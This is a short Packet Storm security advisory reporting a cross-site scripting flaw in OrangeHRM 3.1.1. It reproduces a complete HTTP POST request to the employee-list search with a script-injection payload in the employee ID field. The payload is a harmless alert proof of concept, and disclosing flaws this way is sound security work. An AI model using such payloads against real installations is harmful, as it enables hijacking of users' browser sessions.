OrangeHRM 3.1.1 Cross Site Scripting

2014-02-28T00:00:00
ID PACKETSTORM:125476
Type packetstorm
Reporter HauntIT
Modified 2014-02-28T00:00:00

Description

                                        
                                            `# ==============================================================  
# Title ...| XSS vulnerability in OrangeHRM  
# Version .| OrangeHRM 3.1.1  
# Date ....| 28.02.2014  
# Found ...| HauntIT Blog  
# Home ....| http://www.orangehrm.com  
# ==============================================================  
  
[+] from admin user:  
  
# ==============================================================  
# XSS  
  
---<request>---  
POST /k/cms/orange/orangehrm-3.1.1/symfony/web/index.php/pim/viewEmployeeList HTTP/1.1  
Host: 10.149.14.62  
(...)  
Content-Length: 418  
  
empsearch%5Bemployee_name%5D%5BempName%5D=asdasd&empsearch%5Bemployee_name%5D%5BempId%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&empsearch%5Bid%5D=&empsearch%5Bemployee_status%5D=0&empsearch%5Btermination%5D=1&empsearch%5Bsupervisor_name%5D=asdasd&empsearch%5Bjob_title%5D=0&empsearch%5Bsub_unit%5D=0&empsearch%5BisSubmitted%5D=yes&empsearch%5B_csrf_token%5D=109e14ec2ad65dc3a8eaa4bf8c28582a&pageNo=&hdnAction=search  
---<request>---  
  
  
# ==============================================================  
# More @ http://HauntIT.blogspot.com  
# Thanks! ;)  
# o/   
  
`